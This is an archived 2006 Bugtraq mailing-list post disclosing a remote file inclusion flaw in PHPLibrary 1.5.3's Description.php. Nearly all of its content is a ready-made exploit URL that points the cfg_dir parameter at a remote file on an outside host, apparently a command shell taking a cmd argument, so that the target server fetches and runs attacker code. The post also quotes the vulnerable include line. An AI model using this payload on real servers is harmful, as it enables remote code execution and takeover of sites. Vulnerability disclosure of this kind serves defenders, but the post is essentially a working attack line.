PHPLibrary-1.5.3(Description.php) Remote File Include

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHPLibrary-1.5.3(Description.php) Remote File Include
From: arab_anaconda@xxxxxxxxxxx
Date: 20 Oct 2006 09:07:19 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

created by Anaconda

Exploit : 
http://victim.com/PHPLibrary-1.5.3/Description.php?cfg_dir=http://www.arab4services.com/c-h.v2.txt?cmd
  
include ($lib_dir . "sqlstorage.class.php");

arab4services.com   security team

Prev by Date: Advisory for Oneorzero helpdesk
Next by Date: Re: Flaw in Firefox 2.0 RC2
Previous by thread: Advisory for Oneorzero helpdesk
Next by thread: [OpenPKG-SA-2006.025] OpenPKG Security Advisory (drupal)
Index(es):
- Date
- Thread